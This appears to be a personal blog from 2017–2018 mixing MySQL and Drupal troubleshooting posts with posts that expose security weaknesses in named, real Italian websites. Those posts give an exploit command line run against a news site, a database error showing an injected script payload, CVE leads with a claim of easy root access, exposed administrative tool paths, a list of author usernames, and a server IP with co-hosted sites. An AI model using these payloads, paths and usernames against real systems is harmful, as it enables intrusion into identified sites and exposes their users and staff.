Saturday, 20 January 2018

http://www.ilgiornale.it/ | sql injection, account creation

 Drupal
sql injection and account creation
python 34992 -t http://www.ilgiornale.it/ -u dop -p dop

We can  raise an error to have more info






Drupal
 
PDOException: SQLSTATE[22001]: String data, right truncated: 1406 Data too long for column 'field_cap_value' at row 1: INSERT INTO {field_data_field_cap} (entity_type, entity_id, revision_id, bundle, delta, language, field_cap_value, field_cap_format) VALUES (:db_insert_placeholder_0, :db_insert_placeholder_1, :db_insert_placeholder_2, :db_insert_placeholder_3, :db_insert_placeholder_4, :db_insert_placeholder_5, :db_insert_placeholder_6, :db_insert_placeholder_7); Array ( [:db_insert_placeholder_0] => user [:db_insert_placeholder_1] => 140122 [:db_insert_placeholder_2] => 140122 [:db_insert_placeholder_3] => user [:db_insert_placeholder_4] => 0 [:db_insert_placeholder_5] => und [:db_insert_placeholder_6] => "><script>alert(1);</script><" [:db_insert_placeholder_7] => ) in field_sql_storage_field_storage_write() (linea 514 di /netraid/gluster/ilg/ilgwcms/www/modules/field/modules/field_sql_storage/field_sql_storage.module).

Tuesday, 16 January 2018

http://www.lamicitra.com/ | system compromise






http://www.lamicitra.com/

/home/teguh/public_html/


System is also already compromised by defacers/crackers.

Friday, 22 December 2017

[FIX] ERROR 1436 (HY000) Thread stack overrun - mysql 5.7


How to fix Thread stack overrun with mysql 5.7 (and other versions)


Thread stack overrun with mysql 5.7 on Linux and Windows

Run the server with
mysqld --thread_stack=256k

to configure my.ini/my.cnf (server.cnf) add:

thread_stack = 256K



Further problems with mysql on windows

On 64 bit (windows) probably you will need to give a bigger value
I've been forced to use
thread_stack = 512K
on MySQL Ver 5.6.38 for Win64 on x86_64 (MySQL Community Server (GPL))






Generic errors with mysql_upgrade
ERROR 1436 (HY000) at line 1879: Thread stack overrun
ERROR 1436 (HY000) at line 1935

Use 'mysqld --thread_stack=#' to specify a bigger stack

How to log all the queries in mysql or mariadb - windows and linux

Log all your sql queries on mysql server

Note: use only on your Test Server and without a lot of workload or connections othewise you are going to fill all your disk space or the IO resources (and even the CPU load to wait for IO writing).

Make sure that your logs folder exists and use the same folder of other mysql logs (ex. /var/log/mysql/)

Add in your my.ini/my.cnf (or server.cnf)


on Windows:
general_log_file="C:/yourWindowsMysql/logs/logsql.log"
general_log=1

on linux *unix add:
general_log_file="/var/log/mysqld-queries.log"
general_log=1


 restart your mysql or mariadb server



Friday, 15 December 2017

[FIX] Drupal 7 - metatag unsupported operand


run the following sql command (ex.: from phpmyadmin)

TRUNCATE cache_metatag;

Another possible approach is to use drush from the command line

$ drush cc all


On the drupal website there's no answer to the problem but the answer is quite simple.

Saturday, 9 December 2017

https://www.movimento5stelle.it again | several vulnerabilities, system compromise

Old vulnerabilities and other informations.

The main website shares the same problems with http://rousseau.movimento5stelle.it.

NOTE/Disclaimer: if you are supposing to vote in a safe manner (It's less safe than the cheapest italian service provider with an old version of commoly used scripts, like wordpress or joomla, installed by your "cousin") I can tell you without problems that you are wrong and you've been tricked by your own leaders. I'm not responsible for what they are saying and doing ... you are.
The server mostly haven't been updated for years, except for just what they thought was worth updating.
Please, do not contact me for legal issues. I haven't saved/stored and I do not share any particular *confidential* information. I've nothing to do with any problem that you are facing on those websites.
No, I'm not "politically attacking" anybody. Those, that you are probably supposing, are political speculations from your respective leaders (the same goes for the websites and leaders of other political parties). I'm not involved in any political party.
Think that  I'm helping you to understand that your data is not safe at all.
You must point your finger to those that are managing your confidential informations (and possibly allowing to tamper your vote) without using the most basic good practices and attitude.
I'm not even talking about having the best technology, even the old one could be good as long as they are fixed/patched when/where needed.
I'm not a threat to the future political votes (I'm not tampering data), the party itself is falling in those, and several other, issues and they have been there for years (since 2009?).

Your vote for #parlamentarie in 17/01/2018 was totally insecure as the previous ones. I sent a long time ago, and then published, the informations before the votes but the security problems are still there.
I cannot show more informations than those that can be reached from the "web" (you can use a search engine, the flawed website and your brain to verify) since I got too much attention, even from newspapers, and it's not the purpose of this blog to be somewhat "famous".
Read and think whatever you like, understand, fix whatever you want, don't bother me with silly questions or childish offenses.


----
Local and remote exploitable problem
Perl eval injection vulnerability in the digest module (The payload can be sent via movable type - see below).
https://www.cvedetails.com/cve/CVE-2012-5195/


Movable Type 4* is vulnerable to specific problems.
In another CVE reports "unspecified vectors". A diff of the files between the MT versions leads to the specific problem.

I don't need to (and I can't - see disclaimer) show anything.
It works for sure, just rewrite old (perl) exploits (see the CVE) and add a few lines of extra code.
In around 1 hr of cut/paste/write/run you are root.
___
Some interesting paths

Smarty Demo (with errors since the templates_c is missing):
https://www.movimento5stelle.it/cgi-bin/mt-4/php/extlib/smarty/demo/index.php
http://archive.is/6hh07
It can be mis-used

https://www.movimento5stelle.it/cgi-bin/mt-4/mt-testbg.cgi


-ilblogdellestelle.it-
on the same server of beppegrillo.it shares the same problems and the same database.



*****
(no explanation is needed)
Users/authors:
alberto-callaioli
alberto-moscarda
alessandra-romozzi
alessandro-pirrone
alvise-maniero
chiacchieroni-alfredo
chiara-appendino
danilo-facecchia
emiliano-giancarlo-abbati
fabio-martina
fabio-tercovich
felice-marra
gianpiero-paladino
ivano-tarquini
luca-casmiri
luca-frangella
manlio-cuccaro
marco-fioschini
mariano-zodo
marilena-checchi
paola-indigeno
paolo-cicerone
paolo-tkalez
pasquale-roffini
sabrina-anselmo
salvatore-lisi
stefano-scardia
...


***
other interesting paths

https://www.movimento5stelle.it/cgi-bin/mt-4/tools/*
convert-db
find-junk
list-objects
mt-tmpl-preview
mt-tmpl-test
pl-viewer
plugin-config
rebuild-benchmark
rebuild-pages
remove-object
report-slow-request
run-periodic-tasks
sig-validate
upgrade

example: https://www.movimento5stelle.it/cgi-bin/mt-4/tools/report-slow-request


https://www.movimento5stelle.it/cgi-bin/mt-4/mt-testbg.cgi

#!/usr/bin/perl -w

# Movable Type (r) Open Source (C) 2001-2009 Six Apart, Ltd.
# This program is distributed under the terms of the
# GNU General Public License, version 2.
#
# $Id: mt-testbg.cgi 3455 2009-02-23 02:29:31Z auno $

use strict;

local $| = 1;
print "Content-Type: text/html\n\n";
print "<html>\n<body>\n<pre>\n\n";

eval {
    local $SIG{__WARN__} = sub { print "**** WARNING: $_[0]\n" };

    my $pid = fork();
    if (defined $pid)
    {
        if ($pid) {
            print wait() > 0
                   ? "Background tasks are available\n"
                   : "Background tasks are not available\n";
        } else {
            sleep 1;
            exit(0);
        }
    } else { print "Background tasks are not available\n"; }
};
print "Got an error: $@" if $@;

print "\n\n</pre>\n</body>\n</html>";


mt-tb.cgi - trackback
https://www.movimento5stelle.it/cgi-bin/mt-4/mt-tb.cgi

#!/usr/bin/perl -w

# Movable Type (r) Open Source (C) 2001-2009 Six Apart, Ltd.
# This program is distributed under the terms of the
# GNU General Public License, version 2.
#
# $Id: mt-tb.cgi 3455 2009-02-23 02:29:31Z auno $

use strict;
use lib $ENV{MT_HOME} ? "$ENV{MT_HOME}/lib" : 'lib';
#use MT::Bootstrap App => 'MT::App::Trackback';
require MT::Bootstrap; MT::Bootstrap->import(App => 'MT::App::Trackback');


spamlookup.pm
https://www.movimento5stelle.it/cgi-bin/mt-4/plugins/spamlookup/lib/spamlookup.pm
# Movable Type (r) Open Source (C) 2006-2009 Six Apart, Ltd.
# This program is distributed under the terms of the
# GNU General Public License, version 2.
#
# $Id: spamlookup.pm 3455 2009-02-23 02:29:31Z auno $

# Original copyright (c) 2004-2006, Brad Choate and Tobias Hoellrich

package spamlookup;

use strict;
use MT::JunkFilter qw(ABSTAIN);

sub tborigin {
    my $plugin = shift;
    my ($obj) = @_;

    # only filter TrackBack pings...
    return (ABSTAIN) unless UNIVERSAL::isa($obj, 'MT::TBPing');

    my $domain = extract_domains($obj->source_url, 1);

    my $config = $plugin->get_config_hash('blog:' . $obj->blog_id); # config($plugin);
    my $pingip = $obj->ip;

    if (domain_or_ip_in_whitelist($domain, $pingip, $config->{whitelist})) {
        return (ABSTAIN);
    }
....

References:
original code sources: https://movabletype.org/downloads/archives/ http://www.majordojo.com/projects/

________________________
The store of movimento5stelle is located on different servers, probably managed  by "upcommerce". The server are managed far better than those of the m5s but not good as supposed.
The store is using magento (more than obvious) but it's not updated to the latest version and there are still some sec. fixes to be added. The good part is that they *hide* the administration panel but it's available via the customers' account.
The main problem is not in the store.m5s scripts but in the configuration of  the server.


52.174.21.194
hosted websites
magento.upcommerce.com
store.elitetartufi.com
store.movimento5stelle.it
shop.asiagocheese.it
www.neronailscosmetics.com
www.merchandisingplaza.com
...



_________________________

***
Fun fact:

The theme, with modifications, is almost the same since 2009
In the css we can even read it in the comments.

Archived page:http://archive.is/39WSe


In 2009: /*by Pier Antonio Romano @ Casaleggio Associati - 2009*/
and now: /* Casaleggio Associati - 2009 */ (2017)
http://www.beppegrillo.it/stylesheet_13.css

***


Friday, 1 December 2017

Reggia di caserta - SQL Injection, system compromise, xss, etc | http://www.reggiadicaserta.beniculturali.it



Joomla 1.5.15 (Vulnerable)

http://www.reggiadicaserta.beniculturali.it
Archive.org: https://web.archive.org/web/20170426095201/http://reggiadicaserta.beniculturali.it:80/
They moved to: http://www.reggiadicaserta.beniculturali.it/Joomla/

path: /var/www/reggiadicaserta

They also have malwares (search in the source code http://www.freepokermoney.net or similar urls):

http://www.reggiadicaserta.beniculturali.it/Joomla/index.php?option=com_content&view=article&id=1434:codice-di-comportamento-dei-dipendenti-delle-pubbliche-amministrazioni&catid=212:organico-contatti&Itemid=886

Archived page:http://archive.is/3JJsi


Wordpress 4.8.3 (with bogus plugin and theme)

http://www.reggiadicaserta.beniculturali.it/wp/




the wordpress version is the "new" website and they also "devastated" the, already bad (with malwares), seo optimization by not redirecting urls. I feel very sorry for that. What a mess.